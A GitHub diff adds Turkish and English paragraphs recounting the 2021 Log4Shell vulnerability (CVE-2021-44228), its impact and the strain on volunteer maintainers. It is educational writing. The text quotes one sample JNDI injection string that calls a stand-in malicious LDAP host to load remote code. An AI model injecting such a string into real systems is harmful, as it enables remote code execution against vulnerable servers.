You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Aralık 2021'de bir güvenlik araştırmacısı, dünya çapında milyonlarca uygulama tarafından kullanılan yaygın bir Java günlük kütüphanesi olan Log4j'de kritik bir güvenlik açığı keşfetti. Log4Shell (CVE-2021-44228) olarak adlandırılan bu açık, mümkün olan en yüksek puan olan 10 CVSS puanı aldı. Saldırının uygulanması korkutucu derecede basitti: saldırganlar, kullanıcı adları, arama kutuları ve hatta Minecraft sohbet mesajları gibi günlüğe kaydedilen herhangi bir girdi alanına kötü amaçlı bir JNDI dizesi enjekte ederek uzaktan kod çalıştırabiliyorlardı.
461
+
462
+
Bu güvenlik açığı, Log4j'nin Java Naming and Directory Interface (JNDI) aracılığıyla uzak sunuculardan yazılım bileşenlerini yükleme özelliğini istismar ediyordu, ancak kütüphane bu lookup dizelerinin güvenilir kaynaklardan gelip gelmediğini doğrulamıyordu. `${jndi:ldap://malicious-server.com/exploit}` gibi basit bir dize tüm sistemleri tehlikeye atabiliyordu.
463
+
464
+
Log4Shell, Fortune 500 şirketleri, devlet sistemleri ve Minecraft gibi popüler uygulamalar dahil olmak üzere milyarlarca cihazı etkiledi. Bu olay, kritik açık kaynak altyapısını sürdürmenin gizli insan maliyetini ortaya çıkardı, çünkü gönüllü geliştiriciler kendilerini internetin yarısını etkileyen bir güvenlik açığını yamalamakla sorumlu buldular. Bu kriz, kritik açık kaynak projelerini daha iyi desteklemek ve güvence altına almak için GitHub Secure Open Source Fund gibi girişimlere yol açtı.
In December 2021, a security researcher discovered a critical vulnerability in Log4j. The vulnerability, dubbed Log4Shell (CVE-2021-44228), received a perfect 10 CVSS score - the highest possible rating. The exploit was frighteningly simple: attackers could execute remote code by injecting a malicious JNDI string into any logged input field, such as usernames, search boxes, or even Minecraft chat messages.
461
+
462
+
The vulnerability exploited Log4j's feature that allowed loading software components from remote servers through Java's Naming and Directory Interface (JNDI), but the library didn't validate whether these lookup strings came from trusted sources. A simple string like `${jndi:ldap://malicious-server.com/exploit}` could compromise entire systems.
463
+
464
+
Log4Shell affected billions of devices across Fortune 500 companies, government systems, and popular applications like Minecraft. The incident exposed the hidden human cost of maintaining critical open source infrastructure, as volunteer maintainers found themselves responsible for patching a vulnerability affecting half the internet. The crisis led to initiatives like the GitHub Secure Open Source Fund to better support and secure critical open source projects.
465
+
466
+
Further readings:
467
+
468
+
- [Inside the breach that broke the internet: The untold story of Log4Shell](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)
0 commit comments